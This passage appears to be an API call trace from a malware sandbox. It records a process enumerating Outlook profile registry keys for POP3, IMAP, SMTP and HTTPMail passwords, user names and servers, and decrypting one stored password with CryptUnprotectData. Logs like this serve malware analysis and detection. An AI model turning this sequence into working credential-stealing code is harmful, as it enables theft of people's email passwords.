lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.728] RegQueryValueExW (in: hKey=0x4a4, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x3, lpData=0x0, lpcbData=0x615c15c*=0x131) returned 0x0 [0236.728] RegQueryValueExW (in: hKey=0x4a4, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c160, lpData=0x26d07d0, lpcbData=0x615c15c*=0x131 | out: lpType=0x615c160*=0x3, lpData=0x26d07d0*, lpcbData=0x615c15c*=0x131) returned 0x0 [0236.728] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.768] CryptUnprotectData (in: pDataIn=0x615c158, ppszDataDescr=0x0, pOptionalEntropy=0x615c150, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x615c160 | out: ppszDataDescr=0x0, pDataOut=0x615c160) returned 1 [0236.812] LocalFree (hMem=0x4b74ce0) returned 0x0 [0236.823] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x3bc) returned 0x0 [0236.823] RegQueryValueExW (in: hKey=0x3bc, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.823] RegCloseKey (hKey=0x3bc) returned 0x0 [0236.824] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x3bc) returned 0x0 [0236.824] RegQueryValueExW (in: hKey=0x3bc, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.824] RegCloseKey (hKey=0x3bc) returned 0x0 [0236.825] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x3bc) returned 0x0 [0236.825] RegQueryValueExW (in: hKey=0x3bc, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.825] RegCloseKey (hKey=0x3bc) returned 0x0 [0236.825] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x3bc) returned 0x0 [0236.825] RegQueryValueExW (in: hKey=0x3bc, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.826] RegCloseKey (hKey=0x3bc) returned 0x0 [0236.826] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c16c | out: phkResult=0x615c16c*=0x3bc) returned 0x0 [0236.826] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c19c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c198, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c19c*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c198*=0xe, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.827] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.827] RegQueryValueExW (in: hKey=0x498, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.827] RegCloseKey (hKey=0x498) returned 0x0 [0236.827] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.827] RegQueryValueExW (in: hKey=0x498, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.827] RegCloseKey (hKey=0x498) returned 0x0 [0236.828] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.828] RegQueryValueExW (in: hKey=0x498, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.828] RegCloseKey (hKey=0x498) returned 0x0 [0236.829] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.829] RegQueryValueExW (in: hKey=0x498, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.829] RegCloseKey (hKey=0x498) returned 0x0 [0236.829] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.829] RegQueryValueExW (in: hKey=0x498, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.829] RegCloseKey (hKey=0x498) returned 0x0 [0236.830] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.830] RegQueryValueExW (in: hKey=0x498, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.830] RegCloseKey (hKey=0x498) returned 0x0 [0236.831] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.831] RegQueryValueExW (in: hKey=0x498, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.831] RegCloseKey (hKey=0x498) returned 0x0 [0236.831] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.831] RegQueryValueExW (in: hKey=0x498, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.831] RegCloseKey (hKey=0x498) returned 0x0 [0236.832] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.832] RegQueryValueExW (in: hKey=0x498, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.832] RegCloseKey (hKey=0x498) returned 0x0 [0236.832] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.833] RegQueryValueExW (in: hKey=0x498, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.833] RegCloseKey (hKey=0x498) returned 0x0 [0236.833] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.833] RegQueryValueExW (in: hKey=0x498, lpValueName="Email", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.833] RegCloseKey (hKey=0x498) returned 0x0 [0236.833] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.833] RegQueryValueExW (in: hKey=0x498, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.833] RegCloseKey (hKey=0x498) returned 0x0 [0236.833] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.833] RegQueryValueExW (in: hKey=0x498, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.833] RegCloseKey (hKey=0x498) returned 0x0 [0236.833] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.833] RegQueryValueExW (in: hKey=0x498, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.833] RegCloseKey (hKey=0x498) returned 0x0 [0236.834] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.834] RegQueryValueExW (in: hKey=0x498, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.834] RegCloseKey (hKey=0x498) returned 0x0 [0236.834] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.834] RegQueryValueExW (in: hKey=0x498, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.834] RegCloseKey (hKey=0x498) returned 0x0 [0236.834] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.834] RegQueryValueExW (in: hKey=0x498, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.834] RegCloseKey (hKey=0x498) returned 0x0 [0236.834] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.834] RegQueryValueExW (in: hKey=0x498, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.834] RegCloseKey (hKey=0x498) returned 0x0 [0236.834] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.835] RegQueryValueExW (in: hKey=0x498, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.835] RegCloseKey (hKey=0x498) returned 0x0 [0236.835] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.835] RegQueryValueExW (in: hKey=0x498, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.835] RegCloseKey (hKey=0x498) returned 0x0 [0236.835] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.835] RegQueryValueExW (in: hKey=0x498, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.835] RegCloseKey (hKey=0x498) returned 0x0 [0236.835] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.835] RegQueryValueExW (in: hKey=0x498, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.835] RegCloseKey (hKey=0x498) returned 0x0 [0236.835] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.835] RegQueryValueExW (in: hKey=0x498, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.836] RegCloseKey (hKey=0x498) returned 0x0 [0236.836] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.836] RegQueryValueExW (in: hKey=0x498, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.836] RegCloseKey (hKey=0x498) returned 0x0 [0236.836] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.836] RegQueryValueExW (in: hKey=0x498, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.836] RegCloseKey (hKey=0x498) returned 0x0 [0236.836] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.836] RegQueryValueExW (in: hKey=0x498, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.836] RegCloseKey (hKey=0x498) returned 0x0 [0236.836] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.836] RegQueryValueExW (in: hKey=0x498, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.836] RegCloseKey (hKey=0x498) returned 0x0 [0236.836] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x498) returned 0x0 [0236.837] RegQueryValueExW (in: hKey=0x498, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.837] RegCloseKey (hKey=0x498) returned 0x0 [0236.837] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c16c | out: phkResult=0x615c16c*=0x498) returned 0x0 [0236.837] RegQueryInfoKeyW (in: hKey=0x498, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c19c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c198, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c19c*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c198*=0x7, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.837] CoTaskMemFree (pv=0x0) [0236.837] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x0) returned 0x2 [0236.837] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x615c144, lpdwDisposition=0x615c1cc | out: phkResult=0x615c144*=0x48c, lpdwDisposition=0x615c1cc*=0x1) returned 0x0 [0236.838] RegQueryValueExW (in: hKey=0x48c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.838] RegCloseKey (hKey=0x48c) returned 0x0 [0236.838] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.838] RegQueryValueExW (in: hKey=0x48c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.838] RegCloseKey (hKey=0x48c) returned 0x0 [0236.838] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.838] RegQueryValueExW (in: hKey=0x48c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.839] RegCloseKey (hKey=0x48c) returned 0x0 [0236.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.839] RegQueryValueExW (in: hKey=0x48c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.839] RegCloseKey (hKey=0x48c) returned 0x0 [0236.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.839] RegQueryValueExW (in: hKey=0x48c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.839] RegCloseKey (hKey=0x48c) returned 0x0 [0236.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.839] RegQueryValueExW (in: hKey=0x48c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.839] RegCloseKey (hKey=0x48c) returned 0x0 [0236.840] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.840] RegQueryValueExW (in: hKey=0x48c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.840] RegCloseKey (hKey=0x48c) returned 0x0 [0236.840] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.840] RegQueryValueExW (in: hKey=0x48c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.840] RegCloseKey (hKey=0x48c) returned 0x0 